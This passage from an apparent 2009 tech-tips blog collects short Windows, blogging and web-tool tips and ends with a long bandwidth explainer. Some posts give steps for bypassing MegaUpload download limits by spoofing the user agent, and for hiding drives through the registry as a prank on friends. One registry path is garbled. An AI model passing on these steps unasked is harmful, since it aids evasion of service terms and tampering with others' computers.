2. Click HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
3. Look at its below subkey and search for application that you'd like to delete.
4. Right click on that application then choose delete or simply press Delete button.
5. Now close/exit the Registry Editor window.

Now go to Add/Remove Programs and notice that application has been clearly removed from the list by using this simple trick.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

A MOTHERS LOVE

A little boy came up to his mother in the kitchen one evening while she was fixing supper, and handed her a piece of paper that he had been writing on. After his Mom dried her hands on an apron, she read it, and this is what it said:

For cutting the grass: $5.00
For cleaning up my room this week: $1.00
For going to the store for you: $.50
Baby-sitting my kid brother while you went shopping: $.25
Taking out the garbage: $1.00
For getting a good report card: $5.00
For cleaning up and raking the yard: $2.00
Total owed: $14.75

Well, his mother looked at him standing there, and the boy could see the memories flashing through her mind. She picked up the pen, turned over the paper he'd written on, and this is what she wrote:

For the nine months I carried you while you were growing inside me:
No Charge

For all the nights that I've sat up with you, doctored and prayed for you:
No Charge

For all the trying times, and all the tears that you've caused through the years:
No Charge

For all the nights that were filled with dread, and for the worries I knew were ahead:
No Charge

For the toys, food, clothes, and even wiping your nose:
No Charge

Son, when you add it up, the cost of my love is:
No Charge.

When the boy finished reading what his mother had written, there were big tears in his eyes, and he looked straight at his mother and said, "Mom, I sure do love you." And then he took the pen and in great big letters he wrote: "PAID IN FULL".

Lessons:

You will never how much your parents worth till you become a parent

Be a giver not an asker, especially with your parents. there is a lot to give, besides money.

Advice: IF your mom is alive and close to you, give her a big kiss and ask her for forgiveness. If she is far away, call her. if she passed away, pray for her.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Throw away your iTunes and Transfer Music to iPod from PC

Most of them have an iPod and knows about iTunes (used for transfering music from PC to iPod), its the sickest application from Apple. We like OS X and Netbook but when it comes to music players, Apple's is one of the worst. Moreover new users find it very difficult to use iTunes to transfer music and also it offers only one way synchornization of music from PC to iPod.

For all iTunes haters here is a freeware called Sharepod to overcome all the restrictions and transfer data iPod from PC and vice versa. even you can backup all your music. Here are some features about Sharepod -

# You can Add Music, Videos and Backup photos from your iPod.
# Add remove album art and edit playlists.
# Copy music ,videos and playlists from your iPod to PC.
# Import music/videos into your iTunes library, including playlists and ratings.
# Drag n Drop feature with simple and clean interface.
# Mainly Quick to load, Light weight and use with no complicated features.


Sharepod - Homepage: http://www.getsharepod.com/download/
http://www.getsharepod.com/about/

SharePod is completely free!

This is an good alternative to iTunes

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Try Out Application or Operating System Within Your Web Browser Without Installation

Have you ever imagined to test Application or even a Operating System without taking the time to download and install it first ? Yay ! it proves you can.

Click2try is a website which offers us to try out around 50 desktop applications and 3 Linux distributions from your web browser. you can access the application or use the operating system from your web browser without installing it. You can Eliminate the usual software headaches like hardware purchase, software license, etc. All you need is Java and a good modern browser in order to run the applications. Internet Explorer 7 above, Firefox , Google Chrome and Safari all works.

You can try any application without Signing up with the site. If you want to save your sessions you need to signup for a free account. You can also purchase a subscription if you want to access an application for an extended period of time or run more than one application at a time.

Click2try deals now with 9 catalog's like Business, Education, Linux, Office, Software Development, System or Network Admin, Utilities, Vertical Applications and Web Development. In each catalog you can find different categories - If say Business, it has different categories like Accounting , E-commerce, etc.

Some screenshots when i used Ubuntu


My Favorites are Ubuntu and WordPress. I tried my hand on Ubuntu (because i have installed Windows OS in my System) and I also tried working on WordPress (thinking to shift to it). You can also try Forums PhpBB which is placed under Web development catalog. some famous Click2try includes Ubuntu, OpenSUSE, and CentOS Linux distributions and applications including Chandler, Filezilla, Oxygen Office, WordPress, Drupla, and Joomla.

Click2try - Homepage: http://www.click2try.com/

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Create your own Patterns and Background Images within 40 seconds


Everyone loves to design their own background images or atleast a background design pattern. Whether its a blog or website or any social profile page then background image is must, but choosing the appropriate background image is slightly a tougher work and our taste is like a mad monkey, it keeps on changing our minds.

You can even ask me "there are millions of background images and stuffs available on the web and whats so special in this post ?" but really finding images matching the foreground colors and copyrights are definitely boring and takes a lot of time. If you are a master in Adobe Photoshop or any other tool its good, but it takes lot of time. then what is the solution ?? continue reading below ..

So here's a great tool called Repper where you can simple upload any image and drag a small window over the image and whooaaa ! Your pattern is ready - like shown below. The uploaded image can be anything which is captured on your camera or some wallpapers which you like , etc..

You can use Repper to create unique background patterns for your social profiles or your personal webpage or use it for posters or business cards, to design textile patterns or whatever you can think of; your imagination is your only limit!

How to use it ?

1. First go here (http://repper.studioludens.com/repper.html)and by default there are some images from which you can create your pattern designs.

2. You have a drag feature (white color box) you can drag and design your pictures from the right bottom image.

(1. Random image button and Upload Image button 2. Drag white box 3. Save button)

3. On the top bar you have 2 types of patters , you can click and change according to your taste.

4. You can also click the random image button and change the images.

5. Then you have an option of uploading your own image and creating a pattern from them and

6. Finally you can save your design. You can either link to it from your social profile or webpage, or download the pattern to your computer.

The small picture shown with a green border at the right bottom is what I uploaded, and further the green square inside the image is the area selected and finally the red arrows show the pattern that is formed by that small selected area.

You can also chose images and patterns from the Gallery page (left side) - here (http://repper.studioludens.com/gallery.html). You have an option to download the selected from the right bottom window.

Tip : You can create a beautiful background image for your twitter profile.

Repper - Homepage Link : http://repper.studioludens.com/

Give this tool a try and turn your images into eye-catching designs.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How to Bypass MegaUpload Limits

For Firefox:

1.) First go to http://addons.mozilla.org/firefox/59/
2.) Click Install Now to install addon.
3.) Restart FF. Tool–>User Agent Switcher–>Options–>Options
4.) Click User Agents–>Add

Type this:
+ Description: MEGAUPLOAD
+ User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar)

5.) Click OK twice to finish adding User Agent.
6.) From now, before downloading any file from MegaUpload, just go Tools–>User Agent Switcher–>MEGAUPLOAD.

For Internet Explorer, Maxthon, Anvant Browser:

1.) Start–>Run–>Regedit–>OK

In Registry Editor window:

[HKEY_LOCAL_MACHINE\SOFTWARE\Mcft\Windows\CurrentVersion\Internet Settings\5.0\User Agent\Post Platform]

Right click Post Platform–>New–>String Value–> Type “Alexa Toolbar”
Restart PC. Done!

NOTE: For IE 7.0 the “Post Platform” will located at:

[HKEY_LOCAL_MACHINE\SOFTWARE\Mcft \Windows\ CurrentVersion\Internet Settings\ User Agent\Post Platform]

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Friday, August 14, 2009

How To Schedule Posts On Blogger Blogs


Schedule posts feature in blogger allows us to schedule our posts to be published automatically in future. This feature is very useful when we are going out of station or don’t have time to post for some days. In that case we can schedule some posts and they will be published automatically at the scheduled time in future.

How to Schedule a post ?

It is very easy procedure, just follow the simple steps given here to schedule your posts.

Write a post and Click on Post Options at the end of post editor.

Now set the date and time at which you want to publish your post and click on Publish Post button.

That’s all. Now your post is scheduled. It will be published on the time that you set for it.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How to Hide Your Drives for Privacy or Pranks


In my previous posts i posted a trick to hide a particular drive. This is same trick but with a different method. You can play this trick with your friends or anyone you want to have fun with or for you own privacy. When you click on My Computer no drives or a specific drive will be shown.

How to hide all the Drives:
===========================
1. Go to Start -> Run Type "regedit"

Navigate to: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

2. Now in the right pane create a new DWORD item by right clicking -> New -> DWORD value and name it NoDrives. And modify it's value and set it to 3FFFFFF (Hexadecimal).

3. That's it ! Restart your Pc to take effect.


How to hide a Specific Drive:
=============================

For hiding a "Specific" or "Multiple Drive" use values (For example, for A, B, C, D, E, F, G, H drives,the values are 1, 2, 4, 8, 16, 32, 64, and 128 respectively).

For example: To hide D drive, you would type in the number "8"

How to hide Multiple Drives:
============================

For example: You want to hide drive D and drive E, you would type in the number 24 (which is 8 + 16).

Note: To enable the display of all the drives in My Computer, simply change the value of NoDrives to 0 or simply delete this DWORD item.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Cool Maths trick !

Ur cell number Last digit*2+5*50+ur Age+365-615

In Answer the last 2 digit is ur Age n 1st number is ur cell number last digit

Try it and comment !!

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Generate Status Messages for Social Networking sites with Generatus!


Now don’t waste your valuable time to think of something suitably witty, funny and original for your status on Social Networking sites like Facebook or Twitter.Generatus is a social networking status generator presents an amazing new tool saves time by generating status updates for you.All you need to do is add your name and gender and click on a generate button.

Don’t forget to indicate whether you are a boy or a girl, then hit Generate. You will get a brand new, sparkly status , so just copy it and paste into Facebook, Twitter or whichever social networking site you like best.

In their own words“How many hours have you wasted trying to think of something suitably witty, funny and original for your status on Facebook or Twitter? Let’s face it, a status like ‘Dave is mowing the lawn’ or ‘Kate is asleep’ is not going to impress that huge entourage of friends you’ve amassed. Never fear! Your days of boring status updates are over! Simply type your name, indicate whether you are a boy or a girl, then hit Generate.”

You can also enter tags in the tag filter and Generatus will generate status messages for you based on those tags.

Links :http://www.generatus.com/
Links :http://www.generatus.com/TagCloud.asp

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Protect your Pictures with Visual Watermark


Visual Watermark is photo watermarking software for digital photo protection. This photo watermark software places very strong watermarks that no one can remove. Your digital photos will be effectively protected from unauthorized use. It is useful for everyone who wants to protect their photos.

Features :
Batch mode: protect a photo group of any size at a time.
Protect photo independent of their format – Visual Watermark will process them all.
Edit watermarks in a convenient graphical interface.
Create watermarks out of graphics, text and EXIF values.
Save watermarks for future use .
Apply filters to watermarks : cast shadows , add contours , glowing , gradient and much more .
Rotate watermarks for photos.
Make watermarks more detailed for better protection .
Write your data to EXIF .
Adjust the size of photos.
Pack your photos into the PDF format for better protection.

Screenshots:




Steps to protect your pictures:

Step 1. Select the files you want to protect
Step 2. Select the watermark you want to embed
Step 3. Configure resize
Step 4. Configure output

You can use Visual Watermark in either the standard mode or wizard mode. The standard mode is more flexible and functional. The wizard mode is easier to use.

Links : http://www.tricksmachine.com/wp-content/uploads/2009/07/VW_2.9.21.rar

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How to Extract Texts from Images & PDF Files


We all know that sometimes we are unable to copy texts from some Image files and PDF files.But OCR (Optical Character Recognition) is cool which help you to analyze an image and recognize the text within the image.This short tutorial will show how to extract texts from images and pdf files.OCR Terminal is a free online ‘Optical Character Recognition’ tool that can convert scanned images and PDF files into searchable text.

It will allows you to upload an image and download a text searchable document in a variety of editable formats.

Steps :
1.Select the PDF file or an Image from where you want to extract the text.

2.Click on Upload

3.Once you done with uploading the file or an image, it will ask you for the confirmation and will show you the preview window.

4.After your confirmation at will ask you to save output text in different formats like PDF,RTF,text or Microsoft Word. Choose the option. That’s it !

Supported Input File Formats :
PDF files: All types of PDF files including multi-page PDFs
TIFF files: Black and white, grey and full colour supported. Compressed TIFFs and multipage TIFFs supported
JPEG, JPEG 2000 Grey and colour JPEGs supported
Other image formatsBlack and white,grey and colour BMPs, PNGs and GIFs supported
Output in PDF, RTF, TXT, Microsoft word and more.

Note : You get 20 free pages every month. Pages are topped up on the 1st of every month.You have to register before use.

Links: http://www.ocrterminal.com/
Register at: https://www.ocrterminal.com/user/create.cgi

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How to change blogger domain to co.cc

co.cc is a free domain site. We can change our blog domain "name.blogspot.com" to "name.co.cc". To change our default blogspot name to co.cc domain name follow these steps :


1. Open website http://www.co.cc

2. Then check the availability of your domain name on the search box.

3. If it is not available then you have to find another domain name. But if it is available then register yourself.

4. Then you have to setup your domain. Click on "setup --> Manage domain" you will see it on the left hand side.

Now there are three ways to setup:


Manage DNS

Leave it i couldn't get it myself :D

Zonal Records

1. Fill it with the following :

Host : www.yourdomainname.co.cc
TTL : ID
Type : CNAME
Value : ghs.google.com

2. Click Setup.

The you have to make some setup in your blogger account.

1. Login to Blogger account then choose "Setting --> Publishing"

2. Then choose "Switch to Custom Domain"

3. Then click on "Already own a domain then click on advanced settings"

4. Fill it with your new domain in the "www.yourdomain.co.cc"

5. Save Setting.

Url Forwarding

1. Fill with the following :

Redirect To : www.yourblogaddress.blogspot.com
Page Title : What ever you like
Frame : Url Hiding

2. Click Setup.

Note : It will take few hours for your new domain to work.

If you have choosen "Url Forwarding" then you will be able to open both "blogspot" domain and "co.cc" domain.

If you have choosen "Zonal Records" then your "blogspot" domain will be redirected to your new domain if opened.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

How to Fool Your Friends with PeterAnswers


For those who doesn’t have any knowledge about Peter Answers, it is a virtual tarot web application that can answer virtually any question. With the vast number of questions he receives everyday, you still have to type a petition for him to answer your question. PeterAnswers is the “Interactive Souls Engine” and “virtual tarot” is really no more than a fancy prank.You can easily fool your friends with this website. I am writing a simple tutorial which will guide you to use this trick.

Follow the simple steps :

1) Visit PeterAnswers.com. When the page loads , there are instructions and two blank fields, “Petition” and “Question.”

2) Now tell your friends that Peter Answers Virtual Tarot can read minds, and will answer your question.

3) Now Ask your friends question, now you can make a petition by writing Peter, please answer: or Peter , Plz answer the Question etc.

4)Ignore the directions of the site. Realize that Peter Answers is a gag you can play on your friends. So the directions are a front.

5)Now instead of putting “peter, please answer:” put period “.” (not with the quotation marks) and put your answer and then put another “.” and then type out the rest of the petition.

6)Then type down the question with the question mark. And then accept the terms and Peter will answer your question…

7) That’s it. Enjoy.

This is a great game to play with friends or when you are hanging out late at night. Be prepared for some startling responses and don’t give the secret away.Thanks Pallavi for this beautiful trick.

Links : http://www.peteranswers.com/

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Hide Number Posts under Label / Categories in Blogger

Number Posts under Label/Categories does not give a very good impression when you have too many post in one label / Categories and very less post in the other, because less people will show interest in clicking them.

Here is an easy trick which you can do which will "Hide numbers being displayed under labels"

How to apply:
============

* Login to blogger -> Dashboard -> Layout -> html

* Check on "Expand Widget"
* Search for below highlighted line and



* That's it ! (First Preview it, if no error then save it)

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Can't Open xlsx pptx and docx files ??


What are .pptx .xlsx .docx files ?
These are the files created by Office 2007,Up to office 2003 the it was .xls .ppt and .doc Most off them started working in Office 2007. If you create and just save a file from Office 2007, users with previous versions cant open this file.

In this case. When you save a file do “Save as” and select option “ word 97-2003 Document” from the “file menu” Then the saved file will be compactable for the entire previous versions But what will you do when you get a file with these extensions? Don’t worry! Microsoft released a tool to named “Microsoft Office Compatibility Pack” Using this tool you can convert office 2007 files to the compatible file format for older versions.

Download This Application from Here:
https://www.microsoft.com/downloads/details.aspx?FamilyID=941b3470-3ae9-4aee-8f43-c6bb74cd1466&displaylang=en

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

2007 Microsoft Office Add-in: Microsoft Save as PDF

I use Microsoft Save as PDF to convert my Word documents to PDF easily with Office 2007. You can also create your own Ebook using this Add-in.

Save your Access,Excel,InfoPath,OneNote,PowerPoint ,Publisher,Visio and Word as PDF.

Microsoft Save as PDF allows you to export and save to the PDF and XPS formats in eight 2007 Microsoft Office programs. It also allows you to send as e-mail attachment in the PDF and XPS formats in a subset of these programs.

Note: This Microsoft Save as PDF Add-in Works Only With Office 2007

How To Save Your Office 2007 Works in PDF:
After you install this download open the document you want to publish and then, depending on the program you are using, select Save or Publish to PDF or XPS from the Office or File menu.

For more information, search Office Help for "Save a file in PDF format" or "Save a file in XPS format".

How To remove this Microsoft Save as PDF:
On the Start menu, point to Settings and then click Control Panel.

Double-click Add/Remove Programs.

In the list of currently installed programs, select Microsoft Save as PDF or XPS Add-in for 2007 Microsoft Office programs and then click Remove or Add/Remove. If a dialog box appears, follow the instructions to remove the program.

Click Yes or OK to confirm that you want to remove the program.

Download this application from: http://www.microsoft.com/downloads/thankyou.aspx?familyId=4d951911-3e7e-4ae6-b059-a2e79ed87041&displayLang=en

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo

Saturday, August 8, 2009

BandWidth Explained

Most hosting companies offer a variety of bandwidth options in their plans. So exactly what is bandwidth as it relates to web hosting? Put simply, bandwidth is the amount of traffic that is allowed to occur between your web site and the rest of the internet. The amount of bandwidth a hosting company can provide is determined by their network connections, both internal to their data center and external to the public internet.


Network Connectivity

The internet, in the most simplest of terms, is a group of millions of computers connected by networks. These connections within the internet can be large or small depending upon the cabling and equipment that is used at a particular internet location. It is the size of each network connection that determines how much bandwidth is available. For example, if you use a DSL connection to connect to the internet, you have 1.54 Mega bits (Mb) of bandwidth. Bandwidth therefore is measured in bits (a single 0 or 1). Bits are grouped in bytes which form words, text, and other information that is transferred between your computer and the internet.

If you have a DSL connection to the internet, you have dedicated bandwidth between your computer and your internet provider. But your internet provider may have thousands of DSL connections to their location. All of these connection aggregate at your internet provider who then has their own dedicated connection to the internet (or multiple connections) which is much larger than your single connection. They must have enough bandwidth to serve your computing needs as well as all of their other customers. So while you have a 1.54Mb connection to your internet provider, your internet provider may have a 255Mb connection to the internet so it can accommodate your needs and up to 166 other users (255/1.54).


Traffic

A very simple analogy to use to understand bandwidth and traffic is to think of highways and cars. Bandwidth is the number of lanes on the highway and traffic is the number of cars on the highway. If you are the only car on a highway, you can travel very quickly. If you are stuck in the middle of rush hour, you may travel very slowly since all of the lanes are being used up.

Traffic is simply the number of bits that are transferred on network connections. It is easiest to understand traffic using examples. One Gigabyte is 2 to the 30th power (1,073,741,824) bytes. One gigabyte is equal to 1,024 megabytes. To put this in perspective, it takes one byte to store one character. Imagine 100 file cabinets in a building, each of these cabinets holds 1000 folders. Each folder has 100 papers. Each paper contains 100 characters - A GB is all the characters in the building. An MP3 song is about 4MB, the same song in wav format is about 40MB, a full length movie can be 800MB to 1000MB (1000MB = 1GB).

If you were to transfer this MP3 song from a web site to your computer, you would create 4MB of traffic between the web site you are downloading from and your computer. Depending upon the network connection between the web site and the internet, the transfer may occur very quickly, or it could take time if other people are also downloading files at the same time. If, for example, the web site you download from has a 10MB connection to the internet, and you are the only person accessing that web site to download your MP3, your 4MB file will be the only traffic on that web site. However, if three people are all downloading that same MP at the same time, 12MB (3 x 4MB) of traffic has been created. Because in this example, the host only has 10MB of bandwidth, someone will have to wait. The network equipment at the hosting company will cycle through each person downloading the file and transfer a small portion at a time so each person's file transfer can take place, but the transfer for everyone downloading the file will be slower. If 100 people all came to the site and downloaded the MP3 at the same time, the transfers would be extremely slow. If the host wanted to decrease the time it took to download files simultaneously, it could increase the bandwidth of their internet connection (at a cost due to upgrading equipment).


Hosting Bandwidth

In the example above, we discussed traffic in terms of downloading an MP3 file. However, each time you visit a web site, you are creating traffic, because in order to view that web page on your computer, the web page is first downloaded to your computer (between the web site and you) which is then displayed using your browser software (Internet Explorer, Netscape, etc.) . The page itself is simply a file that creates traffic just like the MP3 file in the example above (however, a web page is usually much smaller than a music file).

A web page may be very small or large depending upon the amount of text and the number and quality of images integrated within the web page. For example, the home page for CNN.com is about 200KB (200 Kilobytes = 200,000 bytes = 1,600,000 bits). This is typically large for a web page. In comparison, Yahoo's home page is about 70KB.


How Much Bandwidth Is Enough?

It depends (don't you hate that answer). But in truth, it does. Since bandwidth is a significant determinant of hosting plan prices, you should take time to determine just how much is right for you. Almost all hosting plans have bandwidth requirements measured in months, so you need to estimate the amount of bandwidth that will be required by your site on a monthly basis

If you do not intend to provide file download capability from your site, the formula for calculating bandwidth is fairly straightforward:

Average Daily Visitors x Average Page Views x Average Page Size x 31 x Fudge Factor

If you intend to allow people to download files from your site, your bandwidth calculation should be:

[(Average Daily Visitors x Average Page Views x Average Page Size) +
(Average Daily File Downloads x Average File Size)] x 31 x Fudge Factor

Let us examine each item in the formula:

Average Daily Visitors - The number of people you expect to visit your site, on average, each day. Depending upon how you market your site, this number could be from 1 to 1,000,000.

Average Page Views - On average, the number of web pages you expect a person to view. If you have 50 web pages in your web site, an average person may only view 5 of those pages each time they visit.

Average Page Size - The average size of your web pages, in Kilobytes (KB). If you have already designed your site, you can calculate this directly.

Average Daily File Downloads - The number of downloads you expect to occur on your site. This is a function of the numbers of visitors and how many times a visitor downloads a file, on average, each day.

Average File Size - Average file size of files that are downloadable from your site. Similar to your web pages, if you already know which files can be downloaded, you can calculate this directly.

Fudge Factor - A number greater than 1. Using 1.5 would be safe, which assumes that your estimate is off by 50%. However, if you were very unsure, you could use 2 or 3 to ensure that your bandwidth requirements are more than met.

Usually, hosting plans offer bandwidth in terms of Gigabytes (GB) per month. This is why our formula takes daily averages and multiplies them by 31.


Summary

Most personal or small business sites will not need more than 1GB of bandwidth per month. If you have a web site that is composed of static web pages and you expect little traffic to your site on a daily basis, go with a low bandwidth plan. If you go over the amount of bandwidth allocated in your plan, your hosting company could charge you over usage fees, so if you think the traffic to your site will be significant, you may want to go through the calculations above to estimate the amount of bandwidth required in a hosting plan.

Add To Google BookmarksStumble ThisFav This With TechnoratiAdd To Del.icio.usDigg ThisAdd To RedditTwit ThisAdd To FacebookAdd To Yahoo